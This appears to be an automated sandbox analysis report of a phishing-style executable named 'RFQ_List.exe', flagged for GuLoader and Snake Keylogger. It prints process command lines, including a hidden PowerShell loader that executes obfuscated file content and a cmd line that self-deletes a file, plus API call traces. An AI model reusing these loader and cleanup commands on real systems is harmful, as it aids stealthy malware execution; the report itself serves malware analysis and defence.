Commandline:	"powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"
Imagebase:	0xa20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2349116146.0000000009279000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:46:00
Start date:	28/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:46:59
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0xc0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:47:32
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\System32\msiexec.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:47:32
Start date:	28/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff71e800000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:47:32
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0xa30000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	27.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.1%
Total number of Nodes:	1303
Total number of Limit Nodes:	46

Executed Functions

Function 004032A0 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004032C2
GetVersion.KERNEL32 ref: 004032C8
#17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
OleInitialize.OLE32(00000000), ref: 0040331F
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\RFQ_List.exe",00000000), ref: 00403363
CharNextW.USER32(00000000,"C:\Users\user\Desktop\RFQ_List.exe",00000020), ref: 0040338A

Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
DeleteFileW.KERNELBASE(1033), ref: 0040352B

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

OleUninitialize.OLE32(?), ref: 004035F6
ExitProcess.KERNEL32 ref: 00403618
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ_List.exe",00000000,?), ref: 0040362B
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ_List.exe",00000000,?), ref: 0040363A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ_List.exe",00000000,?), ref: 00403645
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ_List.exe",00000000,?), ref: 00403651
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
CopyFileW.KERNEL32(C:\Users\user\Desktop\RFQ_List.exe,0042AA28,00000001), ref: 004036DB
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
AdjustTokenPrivileges.ADVAPI32 ref: 00403776
ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
ExitProcess.KERNEL32 ref: 004037BE

Strings

USERENV, xrefs: 004032F1
TMP, xrefs: 00403512
SETUPAPI, xrefs: 004032FB
C:\Users\user\Desktop, xrefs: 0040364A, 0040364F, 0040367C
C:\Users\user\Desktop\RFQ_List.exe, xrefs: 004036D6
"C:\Users\user\Desktop\RFQ_List.exe", xrefs: 00403356, 0040335C, 00403553
\Temp, xrefs: 004034DC
NSIS Error, xrefs: 00403341
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes, xrefs: 004035D3
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes, xrefs: 004034A8, 004035C8, 00403673, 0040367D
UXTHEME, xrefs: 004032E7
Error launching installer, xrefs: 004035AD
Low, xrefs: 004034F8
~nsu, xrefs: 00403623
.tmp, xrefs: 0040363F
TEMP, xrefs: 0040350A
C:\Users\user\AppData\Local\Temp\, xrefs: 004034BA, 004034BF, 004034D5, 004034E1, 004034F0, 004034FD, 00403509, 00403511, 00403628, 00403639, 00403644, 00403650, 0040365D, 0040366C, 0040371D
1033, xrefs: 00403526
SeShutdownPrivilege, xrefs: 0040374D

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\RFQ_List.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes$C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQ_List.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
API String ID: 3586999533-3841915379
Opcode ID: 7aacc1c0a5729f3ef0a85289c626a3cb867d7b07120bbbf6836a4d0ed1df39ea
Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
Opcode Fuzzy Hash: 7aacc1c0a5729f3ef0a85289c626a3cb867d7b07120bbbf6836a4d0ed1df39ea
Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

Function 00404B30 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B48
GetDlgItem.USER32(?,00000408), ref: 00404B53
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
LoadBitmapW.USER32(0000006E), ref: 00404BB0
SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
DeleteObject.GDI32(00000000), ref: 00404C26
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
GetWindowLongW.USER32(?,000000F0), ref: 00404D61
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
ShowWindow.USER32(?,00000005), ref: 00404D80
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
ImageList_Destroy.COMCTL32(?), ref: 00404F50
GlobalFree.KERNEL32(?), ref: 00404F60
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
SendMessageW.USER32(?,00001102,?,?), ref: 00405082
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
ShowWindow.USER32(?,00000000), ref: 004050FF
GetDlgItem.USER32(?,000003FE), ref: 0040510A
ShowWindow.USER32(00000000), ref: 00405111

Strings

N, xrefs: 00404DBB
M, xrefs: 00404CDA
, xrefs: 004050E9

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

Function 00406077 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D8A2), ref: 0040613A
GetSystemDirectoryW.KERNEL32(Space required: ,00000400), ref: 004061B8
GetWindowsDirectoryW.KERNEL32(Space required: ,00000400), ref: 004061CB
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
SHGetPathFromIDListW.SHELL32(?,Space required: ), ref: 00406215
CoTaskMemFree.OLE32(?), ref: 00406220
lstrcatW.KERNEL32(Space required: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
lstrlenW.KERNEL32(Space required: ,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D8A2), ref: 0040629E

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
Space required: , xrefs: 004060A1, 00406181, 004061A2, 004061B7, 004061CA, 004061E6, 00406211, 00406243, 00406249, 00406263, 00406277, 00406297, 0040629D, 004062A9, 004062DC

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$Space required: $\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1002770640
Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

Function 00405846 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 0040586F
lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 004058B7
lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 004058DA
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 004058E0
FindFirstFileW.KERNELBASE(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 004058F0
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
FindClose.KERNEL32(00000000), ref: 0040599F

Strings

\*.*, xrefs: 004058B1
C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
"C:\Users\user\Desktop\RFQ_List.exe", xrefs: 0040584F

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\RFQ_List.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2818191645
Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes, xrefs: 00402154

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes
API String ID: 542301482-2072545860
Opcode ID: c9022358312334301b7f12b82a851e8225c8b7b61dd5b1f0802db8af2cd3e825
Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
Opcode Fuzzy Hash: c9022358312334301b7f12b82a851e8225c8b7b61dd5b1f0802db8af2cd3e825
Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54

Function 00406398 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(74DF3420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
FindClose.KERNEL32(00000000), ref: 004063AF

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC

Function 00403C41 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
ShowWindow.USER32(?), ref: 00403C9A
DestroyWindow.USER32 ref: 00403CAE
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
GetDlgItem.USER32(?,?), ref: 00403CEB
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
IsWindowEnabled.USER32(00000000), ref: 00403D06
GetDlgItem.USER32(?,00000001), ref: 00403DB4
GetDlgItem.USER32(?,00000002), ref: 00403DBE
SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
GetDlgItem.USER32(?,00000003), ref: 00403ECF
ShowWindow.USER32(00000000,?), ref: 00403EF0
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
EnableWindow.USER32(?,?), ref: 00403F1D
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
EnableMenuItem.USER32(00000000), ref: 00403F3A
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
ShowWindow.USER32(?,0000000A), ref: 004040D6

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

Function 0040389E Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458

GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 004038B8

Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9

lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 0040391F
lstrlenW.KERNEL32(Space required: ,?,?,?,Space required: ,00000000,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
